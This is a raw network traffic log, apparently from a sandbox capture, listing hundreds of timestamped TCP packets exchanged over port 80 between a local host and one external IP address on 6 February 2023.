                                                        Feb 6, 2023 14:18:18.916151047 CET805002462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:18.919759035 CET805002462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:18.921911001 CET5002480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:19.038465023 CET5002480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:19.038557053 CET5002580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:19.097985983 CET805002462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:19.098215103 CET5002480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:19.099968910 CET805002562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:19.100966930 CET5002580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:19.101445913 CET5002580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:19.162853956 CET805002562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:19.167455912 CET805002562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:19.168941975 CET5002580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:19.272259951 CET5002580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:19.273268938 CET5002680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:19.333775043 CET805002662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:19.333842993 CET805002562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:19.333985090 CET5002680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:19.334048033 CET5002580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:19.334486961 CET5002680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:19.394897938 CET805002662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:19.397778034 CET805002662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:19.397916079 CET5002680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:19.505495071 CET5002680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:19.506125927 CET5002780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:19.566135883 CET805002662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:19.566235065 CET805002762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:19.566312075 CET5002680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:19.566395998 CET5002780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:19.567096949 CET5002780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:19.627367973 CET805002762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:19.630285025 CET805002762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:19.630448103 CET5002780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:19.740274906 CET5002780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:19.741144896 CET5002880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:19.805696011 CET805002762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:19.805767059 CET805002862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:19.805931091 CET5002780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:19.805999041 CET5002880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:19.806368113 CET5002880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:19.868109941 CET805002862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:19.871136904 CET805002862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:19.871324062 CET5002880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:19.975905895 CET5002880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:19.977581024 CET5002980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:20.037880898 CET805002862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:20.037976027 CET5002880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:20.040155888 CET805002962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:20.040287971 CET5002980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:20.040672064 CET5002980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:20.103213072 CET805002962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:20.106918097 CET805002962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:20.107101917 CET5002980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:20.209503889 CET5002980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:20.210325956 CET5003080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:20.272344112 CET805002962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:20.272602081 CET5002980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:20.272677898 CET805003062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:20.272804976 CET5003080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:20.273308039 CET5003080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:20.335861921 CET805003062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:20.339488983 CET805003062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:20.342843056 CET5003080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:20.445884943 CET5003080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:20.446634054 CET5003180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:20.508634090 CET805003062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:20.508698940 CET5003080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:20.510588884 CET805003162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:20.510680914 CET5003180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:20.511059046 CET5003180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:20.573302984 CET805003162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:20.576251030 CET805003162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:20.582005978 CET5003180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:20.703358889 CET5003180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:20.704550028 CET5003280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:20.765809059 CET805003162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:20.765882969 CET805003262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:20.765919924 CET5003180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:20.765981913 CET5003280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:20.769004107 CET5003280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:20.830725908 CET805003262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:20.834661007 CET805003262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:20.834872961 CET5003280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:20.944502115 CET5003380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:20.944616079 CET5003280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:21.006381989 CET805003262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:21.006428957 CET805003362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:21.006565094 CET5003380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:21.009109974 CET5003380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:21.009218931 CET5003280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:21.079436064 CET805003362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:21.079492092 CET805003362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:21.079636097 CET5003380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:21.194113016 CET5003380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:21.195020914 CET5003480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:21.255912066 CET805003362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:21.256648064 CET805003462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:21.257214069 CET5003480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:21.257214069 CET5003480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:21.272267103 CET5003380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:21.318969011 CET805003462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:21.322240114 CET805003462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:21.322384119 CET5003480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:21.428318977 CET5003480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:21.429225922 CET5003580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:21.516581059 CET805003562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:21.516633987 CET805003462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:21.516921043 CET5003580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:21.516923904 CET5003480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:21.518035889 CET5003580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:21.578548908 CET805003562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:21.582262039 CET805003562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:21.582988977 CET5003580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:21.696180105 CET5003580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:21.696228027 CET5003680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:21.756968021 CET805003562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:21.757066965 CET5003580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:21.757586956 CET805003662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:21.757668972 CET5003680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:21.758203030 CET5003680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:21.819613934 CET805003662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:21.822861910 CET805003662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:21.823087931 CET5003680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:21.928250074 CET5003680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:21.929105043 CET5003780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:21.989907026 CET805003662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:21.989968061 CET805003762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:21.990153074 CET5003680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:21.990176916 CET5003780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:21.991528988 CET5003780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:22.052201986 CET805003762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:22.057874918 CET805003762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:22.060205936 CET5003780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:22.166718960 CET5003780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:22.167716980 CET5003880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:22.231894016 CET805003762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:22.231931925 CET805003862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:22.232074022 CET5003780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:22.232114077 CET5003880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:22.237631083 CET5003880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:22.298048973 CET805003862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:22.301232100 CET805003862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:22.301367998 CET5003880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:22.412684917 CET5003880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:22.413389921 CET5003980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:22.473572016 CET805003862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:22.473661900 CET805003962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:22.473810911 CET5003880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:22.473929882 CET5003980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:22.475115061 CET5003980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:22.535568953 CET805003962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:22.538532972 CET805003962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:22.538743019 CET5003980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:22.647365093 CET5003980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:22.648304939 CET5004080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:22.708075047 CET805003962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:22.708342075 CET5003980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:22.708682060 CET805004062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:22.708830118 CET5004080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:22.709350109 CET5004080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:22.770508051 CET805004062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:22.774275064 CET805004062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:22.774415016 CET5004080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:22.893311977 CET5004080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:22.893326044 CET5004180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:22.954145908 CET805004062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:22.954379082 CET5004080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:22.954878092 CET805004162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:22.954986095 CET5004180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:22.955497026 CET5004180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:23.016917944 CET805004162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:23.020642996 CET805004162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:23.020934105 CET5004180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:23.131498098 CET5004180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:23.132533073 CET5004280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:23.192928076 CET805004262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:23.192984104 CET805004162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:23.193150043 CET5004280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:23.193840027 CET5004180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:23.193844080 CET5004280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:23.254115105 CET805004262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:23.260596991 CET805004262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:23.260823965 CET5004280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:23.366336107 CET5004280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:23.367168903 CET5004380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:23.426729918 CET805004262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:23.426881075 CET5004280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:23.427546978 CET805004362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:23.427654982 CET5004380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:23.431242943 CET5004380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:23.495665073 CET805004362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:23.497637987 CET805004362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:23.497745037 CET5004380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:23.599955082 CET5004380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:23.600661993 CET5004480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:23.660475016 CET805004362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:23.660578966 CET5004380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:23.660911083 CET805004462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:23.661010027 CET5004480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:23.661386967 CET5004480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:23.721892118 CET805004462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:23.724581003 CET805004462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:23.724653959 CET5004480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:23.835139990 CET5004480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:23.836045980 CET5004580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:23.895726919 CET805004462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:23.895819902 CET5004480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:23.896502972 CET805004562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:23.896594048 CET5004580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:23.896930933 CET5004580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:23.957350016 CET805004562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:23.960113049 CET805004562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:23.960225105 CET5004580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:24.069478989 CET5004580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:24.070331097 CET5004680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:24.130045891 CET805004562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:24.130142927 CET5004580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:24.132829905 CET805004662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:24.132965088 CET5004680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:24.134243011 CET5004680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:24.196434975 CET805004662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:24.201291084 CET805004662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:24.201399088 CET5004680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:24.309086084 CET5004680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:24.309972048 CET5004780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:24.370320082 CET805004762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:24.370517015 CET5004780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:24.370968103 CET5004780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:24.371310949 CET805004662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:24.371398926 CET5004680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:24.432576895 CET805004762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:24.436558008 CET805004762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:24.436724901 CET5004780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:24.552793980 CET5004780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:24.553438902 CET5004880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:24.613291979 CET805004762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:24.614821911 CET805004862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:24.614970922 CET5004780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:24.615000010 CET5004880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:24.617449999 CET5004880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:24.693716049 CET805004862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:24.693803072 CET805004862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:24.693926096 CET5004880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:24.802874088 CET5004880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:24.803494930 CET5004980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:24.877899885 CET805004962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:24.877938986 CET805004862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:24.878106117 CET5004880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:24.878330946 CET5004980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:24.878640890 CET5004980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:24.938997030 CET805004962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:24.941565990 CET805004962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:24.944498062 CET5004980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:25.079024076 CET5005080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:25.079108953 CET5004980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:25.139537096 CET805004962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:25.140640020 CET805005062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:25.140953064 CET5005080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:25.140959978 CET5004980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:25.142674923 CET5005080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:25.204118967 CET805005062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:25.208817005 CET805005062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:25.208889961 CET5005080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:25.318773031 CET5005080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:25.319363117 CET5005180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:25.380501032 CET805005062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:25.381583929 CET805005162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:25.381746054 CET5005080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:25.381771088 CET5005180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:25.382181883 CET5005180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:25.444401979 CET805005162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:25.447067022 CET805005162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:25.447294950 CET5005180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:25.555422068 CET5005180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:25.555633068 CET5005280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:25.617124081 CET805005262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:25.617338896 CET5005280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:25.617938042 CET805005162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:25.618047953 CET5005180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:25.625283957 CET5005280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:25.685705900 CET805005262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:25.689321041 CET805005262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:25.689573050 CET5005280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:25.806265116 CET5005280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:25.806911945 CET5005380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:25.871206999 CET805005262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:25.871494055 CET5005280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:25.872162104 CET805005362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:25.872314930 CET5005380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:25.872782946 CET5005380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:25.934223890 CET805005362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:25.937591076 CET805005362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:25.937745094 CET5005380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:26.053822994 CET5005380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:26.054971933 CET5005480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:26.115423918 CET805005362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:26.115596056 CET5005380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:26.116188049 CET805005462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:26.116348028 CET5005480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:26.116806030 CET5005480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:26.178904057 CET805005462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:26.183963060 CET805005462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:26.184179068 CET5005480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:26.288902998 CET5005480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:26.289907932 CET5005580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:26.350298882 CET805005462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:26.350400925 CET5005480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:26.352025032 CET805005562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:26.352118969 CET5005580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:26.352552891 CET5005580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:26.416073084 CET805005562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:26.418876886 CET805005562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:26.418981075 CET5005580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:26.534317017 CET5005580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:26.535156965 CET5005680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:26.596576929 CET805005662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:26.596641064 CET805005562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:26.596703053 CET5005680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:26.596729994 CET5005580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:26.630496025 CET5005680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:26.691970110 CET805005662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:26.694760084 CET805005662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:26.694983006 CET5005680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:26.803262949 CET5005680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:26.804008961 CET5005780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:26.864775896 CET805005662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:26.864877939 CET5005680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:26.865353107 CET805005762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:26.865436077 CET5005780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:26.865833998 CET5005780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:26.928813934 CET805005762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:26.931377888 CET805005762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:26.931442976 CET5005780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:27.037441015 CET5005780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:27.038103104 CET5005880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:27.098265886 CET805005862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:27.098453999 CET5005880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:27.099131107 CET805005762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:27.099256992 CET5005780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:27.099529982 CET5005880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:27.159816980 CET805005862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:27.164002895 CET805005862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:27.164105892 CET5005880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:27.272855043 CET5005880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:27.273552895 CET5005980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:27.374924898 CET805005862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:27.374994040 CET805005962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:27.375263929 CET5005880192.168.2.562.204.41.4
